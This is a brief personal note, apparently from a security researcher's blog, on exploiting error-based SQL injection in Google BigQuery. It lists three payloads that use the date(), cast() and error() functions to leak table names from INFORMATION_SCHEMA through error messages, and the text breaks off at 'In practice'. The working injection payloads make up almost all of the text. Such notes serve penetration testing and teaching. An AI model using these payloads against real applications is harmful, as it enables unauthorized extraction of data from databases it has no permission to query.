Exploiting Error Based BigQuery Injection
Here's my quick notes when e xploiting error-based BigQuery injection today. In short, BigQuery has a lot of functions can evaluate sub-query and return results to error message. SELECT ( date (( SELECT table_name FROM `bigquery-public-data.austin_bikeshare.INFORMATION_SCHEMA.TABLES` LIMIT 1 ))) SELECT ( cast (( SELECT table_name FROM `bigquery-public-data.austin_bikeshare.INFORMATION_SCHEMA.TABLES` LIMIT 1 ) as INT64 )) SELECT ( error (( SELECT string_agg ( table_name ) FROM `bigquery-public-data.austin_bikeshare.INFORMATION_SCHEMA.TABLES` ))) In practice